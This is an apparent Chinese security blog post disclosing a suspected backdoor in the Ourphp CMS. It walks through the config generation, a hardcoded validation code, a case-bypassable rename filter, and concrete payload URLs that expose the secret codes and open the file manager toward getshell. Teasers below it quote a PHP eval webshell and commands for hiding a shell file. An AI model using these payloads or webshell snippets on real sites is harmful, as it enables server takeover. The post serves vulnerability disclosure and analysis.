php疑似后门,某php一处疑似官方后门导致getshell

最新推荐文章于 2022-10-28 16:28:03 发布
最新推荐文章于 2022-10-28 16:28:03 发布
阅读量262 收藏
点赞数
文章标签: php疑似后门

return '';

}

(左右滑动)

后门之处,暴露口令码、安全校验码的前32位,6位是在这32位里。

再看看安全校验码生成的地方,在functioninstallindex.php的第288行

$ourphp_safecode = getRandomString(32);

$safecode6 = substr($ourphp_safecode , 6 , 6);

$str_f = '$';

$str_tmp = "<?php

/*

* Ourphp - CMS建站系统

* Copyright (C) 2014 ourphp.net

* -------------------------------

* 网站配置文件 (2016-10-22)

* -------------------------------

*/

define('OURPHPNO', true);

define('WEB_ROOT',substr(dirname(__FILE__), 0, -7));

include '".$mysql_file."';

".$str_f."ourphp = array(

'webpath' => '/', // 网站路径

'validation' => '12345', // 口令码

'adminpath' => 'client/manage', // 管理员默认目录

'mysqlurl' => '".$ourphp_dburl."', // 数据库链接地址

'mysqlname' => '".$ourphp_dbname."', // 数据库登录账号

'mysqlpass' => '".$ourphp_dbpass."', // 数据库登录密码

'mysqldb' => '".$ourphp_mydb."', // 数据库表名

'filesize' => '5000000', // 附件上传最大值

'safecode' => '".$ourphp_safecode.$safecode6."', // 安全校验码

'mysqltype' => '".$mysql_type."',

);

(左右滑动)

可以看到随机一个32位,然后取32位的第6位后的6位拼接

再看clientmanageourphp_filebox.php 第45行

if (@$_GET['validation'] == $ourphp['validation'] && $_GET['code'] == $ourphp['safecode']){

$_SESSION['ourphp_outtime'] = time() + 3600;

$_SESSION['ourphp_out'] = "ourphp";

}else{

if(isset($_SESSION['ourphp_out'])){

$filefolder = str_replace('','/',WEB_ROOT.$ourphp['webpath']);

}else{

include 'ourphp_checkadmin.php';

$filefolder = str_replace('','/',WEB_ROOT.$ourphp['webpath']."templates/");

}

}

(左右滑动)

这里只要口令码、安全校验码正确就可以对文件进行操作(编辑、重命名)

再看832行,重命名的操作,可以大小写绕过

function renam($rename, $nrename, $folder) {

global $meurl,$folder;

$php = explode('.',$nrename);

$php = end($php);

if($php == 'php' || $php == 'asp' || $php == 'jsp' || $php == 'aspx'){

printerror("重命名出错!");

exit;

}

(左右滑动)

Payload:

http://localhost:88//function/editor/php/upload_json.php?upload_file=aaa

http://localhost:88/client/manage/ourphp_filebox.php?op=home&folder=./&validation=12345&code=QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkmYHlDUg

验证:

获取口令码、安全校验码

76f0b36cc2d6f23e8c4133ee715b2d76.png

文件管理:

f447544686b54f0cd043e3306a17f6d6.png

68c7e868485b10e7a0507ce6daa0faae.png

147ceb2b51d86d155ba8c1d08f78fed7.png

dfa4129d0bb0644b3f8c6d6b1589fb81.png

陈子皮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php疑似后门,PhpStudy2016/2018后门漏洞预警及漏洞修复
weixin_39557813的博客
03-21 212
PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHPphp_xmlrpc.dll模块隐藏有后门。经过分析除了有反向连接木马之外,还可以正向执行任意php代码。影响版本及路径通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45以下为参考路径,请以实际安装路径为...
多种php后门
xxx9686的博客
09-25 449
【代码】多种php后门
php后门文件处理方式_PHP后门隐藏的一些技巧总结
weixin_33760049的博客
03-09 884
前言如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。1、隐藏文件使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。attrib +s +a +h +r shell.php //隐藏shell.php文件2、修改文件时间属性当你试图在一...
EXCMS疑似后门
weixin_34127717的博客
12-12 132
某天遇到Excms的系统,官网http://www.excms.cn/ 于GG搜索excms漏洞,发现分析是作者明显藏有后门的漏洞。 下载源码分析,很明显就能找到另一个疑似后门的漏洞(为什么说疑似?因为也不能确定,说不定就是有这样的程序员,呵呵。。) 漏洞文件: apps/include.php - 源码: //加载系统配置文件 - re...
常见php后门分析
W小哥
05-31 816
一、第一种 <?php define('test', 1); #定义一个常量 test,并且值为1 $test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错 if(test == 1){ @eval($test);#一句话木马后门 } 连接方式 二、第二种 ...
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
一个不易被发现的PHP后门代码解析
10-25
主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
80-80.渗透测试-PHP后门反弹连接演示.mp4
最新发布
05-10
80-80.渗透测试-PHP后门反弹连接演示.mp4
php 后门代码_php后门程序演示
weixin_36019375的博客
03-09 664
1.[代码][PHP]代码
FileBox单文件文件管理系统 v1.10.0.2
10-23
FileBox原名MyFTP,是一个完全由PHP打造的单文件管理系统,它可以帮助站长一键备份自己的网站和数据库、一键搬家,或者当空间服务商没有提供文件解压程序的时候拿它当作文件解压程序使用。FileBox修改自孤雨文件管理器v1.2,FileBox在它的基础上添加了许多有用的功能,比如:批量删除、操作完后返回原来的目录、文件大小人性化显示等功能。备注:默认用户名为filebox 密码为fileboxFileBox v1.10.0.2 更新内容:UPDATE底部按钮取消透明度UPDATE手机端更加友好UPDATE细节优化BUG解决跨站XSS的问题
FileBox PHP在线文件管理程序 v1.9.0.1.rar
07-10
FileBox PHP在线文件管理程序,诸如实现在线查看文件列表,批量修改文件名、批量删除、显示文件大小等功能。   帮助站长一键备份自己的网站和数据库、一键搬家,或者当空间服务商没有提供文件解压程序的时候拿它当作文件解压程序使用。 设置说明:   $sitetitle - 标题名称   $filefolder - 程序目录   $user - 用户名   $pass - 密码   $safe_num - 设置多少次后禁止登陆,为0则不限制,建议为3-5   $mail - 若有恶意登录,会发邮件到这个邮箱,前提是mail()函数可用!      默认用户名为filebox 密码为filebox   1.9.0.1 更新:   NEW:现在可以排序文件了
filebox.php
11-08
FileBox原名MyFTP,是一个完全由PHP打造的单文件管理系统,它可以帮助站长一键备份自己的网站和数据库、一键搬家,或者当空间服务商没有提供文件解压程序的时候拿它当作文件解压程序使用。FileBox修改自孤雨文件管理器1.2,在它的基础上添加了很多Useful的功能,比如:批量删除、操作完后返回原来的目录、文件大小人性化显示等功能。 FileBox文件管理系统 1.10.0.2 更新日志:2016-05-01 UPDATE:删除选框,现在直接点击横排就可以选中文件 UPDATE:底部按钮取消透明度
php后门检测工具,phpStudy后门如何检测和修复
weixin_32331345的博客
03-09 1110
背景一篇《Phpstudy官网于2016年被入*,犯罪分子篡改软件并植入后门》让人触目惊心,从官网的下载官方安装包也会有问题,由此可想而知目前已经有多少网站已经沦陷。接到消息的第一时间,我们对以前从官网下载的一个安装包 phpStudySetup.exe 进行了检测,发现 md5=fc44101432b8c3a5140fcb18284d2797,果然也已经在涉及漏洞的列表中。来自文章的原话:”据主...
PHP源码被加入后门,疑git服务器被黑
bingyu1024的博客
04-10 479
上月28日,PHP遭遇软件供应链攻击。2个恶意commit被推送到了位于git.php.net服务器的由PHP 团队维护的php-src Git 仓库。 PHP目前最流行的服务器端编程语言,互联网上超过79%的网站都使用PHP语言。上月28日,PHP遭遇软件供应链攻击。2个恶意commit被推送到了位于git.php.net服务器的由PHP 团队维护的php-src Git 仓库。 这2个恶意commit是经过签名的,通过签名可以发现是由于PHP 开发和维护人员Rasmus Lerdorf和Nik
thinkphp核心源码注释|Hook.class.php
经验在于积累而不在于年限---dreamboycx
02-07 357
<?php // +---------------------------------------------------------------------- // | ThinkPHP [ WE CAN DO IT JUST THINK ] // +---------------------------------------------------------------------- //
filebox管理php,filebox.php
weixin_42261886的博客
03-19 631
/*** 程序说明* @package FileBox* @author Jooies * @copyright Copyright (c) 2014-2016* @since Version 1.8.1.2** 设置说明* $sitetitle - 标题名称* $filefolder - 程序目录* $user - 用户名* $pass - 密码* $safe_num - 设置...
php大马后门分析
win176489的博客
03-31 301
php大马后门分析 分析一下手里的一个php大马,网上找的 源码是这样的 登陆后界面还是比较屌的 直接上echo 打印出这些关键变量 代码如下 输出后发现一个http的地址,还有一个危险函数file_get_contents 官方的文档如下 再继续看原来的代码 再次打印出e和e和e和d的值 这里的思路已经明朗了,它这里会请求链接的gif图片,然后通过file_get_contents函数将内容赋值给$_SESSION[‘PhpCode’] 通过迅雷下载gif图片,文件内容是如下乱码 继续查看原
PhpStudy后门漏洞实战复现
la-大白
10-28 4831
phpstudy后门漏洞
PHP无eval后门技巧解析
"这篇文章主要探讨了PHP中无eval的代码执行后门方法,包括assert、create_function、preg_replace以及mb_ereg_replace等函数的使用。虽然PHP 7对某些函数进行了限制,但仍然存在绕过的方式。" 在PHP中,进行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值